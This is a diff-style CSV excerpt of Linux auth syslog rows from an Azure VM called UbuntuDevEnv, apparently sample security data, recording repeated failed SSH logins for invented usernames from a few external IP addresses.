+11826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:09:39,UbuntuDevEnv,2019-06-26 01:09:39,auth,UbuntuDevEnv,info,Invalid user ccapp from 139.59.34.17 port 46174,82200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ccapp,139.59.34.1,46174,,
+11827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:09:40,UbuntuDevEnv,2019-06-26 01:09:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,82200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:09:40,UbuntuDevEnv,2019-06-26 01:09:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.59.34.17,82200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.59.34.1,,0,
+11829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:09:42,UbuntuDevEnv,2019-06-26 01:09:41,auth,UbuntuDevEnv,info,Failed password for invalid user ccapp from 139.59.34.17 port 46174 ssh2,82200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ccapp,139.59.34.1,46174,,
+11830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:09:42,UbuntuDevEnv,2019-06-26 01:09:41,auth,UbuntuDevEnv,info,"Received disconnect from 139.59.34.17 port 46174:11: Normal Shutdown, Thank you for playing [preauth]",82200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.59.34.1,46174,,
+11831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:09:42,UbuntuDevEnv,2019-06-26 01:09:41,auth,UbuntuDevEnv,info,Disconnected from invalid user ccapp 139.59.34.17 port 46174 [preauth],82200,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ccapp,139.59.34.1,46174,,
+11832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:11:13,UbuntuDevEnv,2019-06-26 01:11:13,auth,UbuntuDevEnv,info,Invalid user sradido from 131.108.48.151 port 22561,82533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sradido,131.108.48.1,22561,,
+11833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:11:13,UbuntuDevEnv,2019-06-26 01:11:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,82533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:11:13,UbuntuDevEnv,2019-06-26 01:11:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,82533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:11:15,UbuntuDevEnv,2019-06-26 01:11:15,auth,UbuntuDevEnv,info,Failed password for invalid user sradido from 131.108.48.151 port 22561 ssh2,82533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sradido,131.108.48.1,22561,,
+11836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:11:16,UbuntuDevEnv,2019-06-26 01:11:15,auth,UbuntuDevEnv,info,Disconnected from invalid user sradido 131.108.48.151 port 22561 [preauth],82533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sradido,131.108.48.1,22561,,
+11837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:11:16,UbuntuDevEnv,2019-06-26 01:11:15,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 22561:11: Bye Bye [preauth],82533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,22561,,
+11838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:13:19,UbuntuDevEnv,2019-06-26 01:13:18,auth,UbuntuDevEnv,info,Invalid user mysql2 from 131.108.48.151 port 31137,82976,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql2,131.108.48.1,31137,,
+11839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:13:19,UbuntuDevEnv,2019-06-26 01:13:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,82976,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:13:19,UbuntuDevEnv,2019-06-26 01:13:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,82976,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:13:21,UbuntuDevEnv,2019-06-26 01:13:20,auth,UbuntuDevEnv,info,Failed password for invalid user mysql2 from 131.108.48.151 port 31137 ssh2,82976,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql2,131.108.48.1,31137,,
+11842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:13:21,UbuntuDevEnv,2019-06-26 01:13:20,auth,UbuntuDevEnv,info,Disconnected from invalid user mysql2 131.108.48.151 port 31137 [preauth],82976,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql2,131.108.48.1,31137,,
+11843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:13:21,UbuntuDevEnv,2019-06-26 01:13:20,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 31137:11: Bye Bye [preauth],82976,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,31137,,
+11844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:15:17,UbuntuDevEnv,2019-06-26 01:15:17,auth,UbuntuDevEnv,info,Invalid user ftptest from 131.108.48.151 port 39711,83428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,131.108.48.1,39711,,
+11845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:15:17,UbuntuDevEnv,2019-06-26 01:15:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,83428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:15:17,UbuntuDevEnv,2019-06-26 01:15:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,83428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:15:19,UbuntuDevEnv,2019-06-26 01:15:18,auth,UbuntuDevEnv,info,Failed password for invalid user ftptest from 131.108.48.151 port 39711 ssh2,83428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,131.108.48.1,39711,,
+11848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:15:19,UbuntuDevEnv,2019-06-26 01:15:19,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 39711:11: Bye Bye [preauth],83428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,39711,,
+11849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:15:19,UbuntuDevEnv,2019-06-26 01:15:19,auth,UbuntuDevEnv,info,Disconnected from invalid user ftptest 131.108.48.151 port 39711 [preauth],83428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,131.108.48.1,39711,,
+11850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:17:14,UbuntuDevEnv,2019-06-26 01:17:14,auth,UbuntuDevEnv,info,Invalid user r_maner from 131.108.48.151 port 48283,84183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,r,131.108.48.1,48283,,
+11851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:17:14,UbuntuDevEnv,2019-06-26 01:17:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,84183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:17:14,UbuntuDevEnv,2019-06-26 01:17:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:17:16,UbuntuDevEnv,2019-06-26 01:17:16,auth,UbuntuDevEnv,info,Failed password for invalid user r_maner from 131.108.48.151 port 48283 ssh2,84183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,r,131.108.48.1,48283,,
+11854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:17:16,UbuntuDevEnv,2019-06-26 01:17:16,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 48283:11: Bye Bye [preauth],84183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,48283,,
+11855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:17:16,UbuntuDevEnv,2019-06-26 01:17:16,auth,UbuntuDevEnv,info,Disconnected from invalid user r_maner 131.108.48.151 port 48283 [preauth],84183,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,r,131.108.48.1,48283,,
+11856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:18:40,UbuntuDevEnv,2019-06-26 01:18:40,auth,UbuntuDevEnv,info,Invalid user vps from 89.132.74.172 port 41162,84584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,89.132.74.1,41162,,
+11857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:18:40,UbuntuDevEnv,2019-06-26 01:18:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:18:40,UbuntuDevEnv,2019-06-26 01:18:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.132.74.172,84584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.132.74.1,,0,
+11859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:18:43,UbuntuDevEnv,2019-06-26 01:18:43,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 89.132.74.172 port 41162 ssh2,84584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,89.132.74.1,41162,,
+11860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:18:43,UbuntuDevEnv,2019-06-26 01:18:43,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 89.132.74.172 port 41162 [preauth],84584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,89.132.74.1,41162,,
+11861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:18:43,UbuntuDevEnv,2019-06-26 01:18:43,auth,UbuntuDevEnv,info,"Received disconnect from 89.132.74.172 port 41162:11: Normal Shutdown, Thank you for playing [preauth]",84584,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.132.74.1,41162,,
+11862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:19:18,UbuntuDevEnv,2019-06-26 01:19:18,auth,UbuntuDevEnv,info,Invalid user charles from 131.108.48.151 port 56840,84718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,131.108.48.1,56840,,
+11863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:19:18,UbuntuDevEnv,2019-06-26 01:19:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:19:18,UbuntuDevEnv,2019-06-26 01:19:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,84718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:19:20,UbuntuDevEnv,2019-06-26 01:19:19,auth,UbuntuDevEnv,info,Failed password for invalid user charles from 131.108.48.151 port 56840 ssh2,84718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,131.108.48.1,56840,,
+11866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:19:20,UbuntuDevEnv,2019-06-26 01:19:20,auth,UbuntuDevEnv,info,Disconnected from invalid user charles 131.108.48.151 port 56840 [preauth],84718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charles,131.108.48.1,56840,,
+11867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:19:20,UbuntuDevEnv,2019-06-26 01:19:20,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 56840:11: Bye Bye [preauth],84718,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,56840,,
+11868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:21:20,UbuntuDevEnv,2019-06-26 01:21:20,auth,UbuntuDevEnv,info,Invalid user serveur from 131.108.48.151 port 65432,85160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serveur,131.108.48.1,65432,,
+11869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:21:20,UbuntuDevEnv,2019-06-26 01:21:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,85160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:21:20,UbuntuDevEnv,2019-06-26 01:21:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:21:21,UbuntuDevEnv,2019-06-26 01:21:21,auth,UbuntuDevEnv,info,Failed password for invalid user serveur from 131.108.48.151 port 65432 ssh2,85160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serveur,131.108.48.1,65432,,
+11872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:21:22,UbuntuDevEnv,2019-06-26 01:21:21,auth,UbuntuDevEnv,info,Disconnected from invalid user serveur 131.108.48.151 port 65432 [preauth],85160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serveur,131.108.48.1,65432,,
+11873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:21:22,UbuntuDevEnv,2019-06-26 01:21:21,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 65432:11: Bye Bye [preauth],85160,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,65432,,
+11874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:23:24,UbuntuDevEnv,2019-06-26 01:23:23,auth,UbuntuDevEnv,info,Invalid user oka from 131.108.48.151 port 17522,85590,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oka,131.108.48.1,17522,,
+11875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:23:24,UbuntuDevEnv,2019-06-26 01:23:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,85590,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:23:24,UbuntuDevEnv,2019-06-26 01:23:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85590,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:23:25,UbuntuDevEnv,2019-06-26 01:23:25,auth,UbuntuDevEnv,info,Failed password for invalid user oka from 131.108.48.151 port 17522 ssh2,85590,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oka,131.108.48.1,17522,,
+11878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:23:26,UbuntuDevEnv,2019-06-26 01:23:25,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 17522:11: Bye Bye [preauth],85590,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,17522,,
+11879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:23:26,UbuntuDevEnv,2019-06-26 01:23:25,auth,UbuntuDevEnv,info,Disconnected from invalid user oka 131.108.48.151 port 17522 [preauth],85590,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oka,131.108.48.1,17522,,
+11880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:25:28,UbuntuDevEnv,2019-06-26 01:25:28,auth,UbuntuDevEnv,info,Invalid user timson from 131.108.48.151 port 26085,86021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,timson,131.108.48.1,26085,,
+11881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:25:28,UbuntuDevEnv,2019-06-26 01:25:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,86021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:25:28,UbuntuDevEnv,2019-06-26 01:25:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:25:30,UbuntuDevEnv,2019-06-26 01:25:30,auth,UbuntuDevEnv,info,Failed password for invalid user timson from 131.108.48.151 port 26085 ssh2,86021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,timson,131.108.48.1,26085,,
+11884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:25:30,UbuntuDevEnv,2019-06-26 01:25:30,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 26085:11: Bye Bye [preauth],86021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,26085,,
+11885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:25:30,UbuntuDevEnv,2019-06-26 01:25:30,auth,UbuntuDevEnv,info,Disconnected from invalid user timson 131.108.48.151 port 26085 [preauth],86021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,timson,131.108.48.1,26085,,
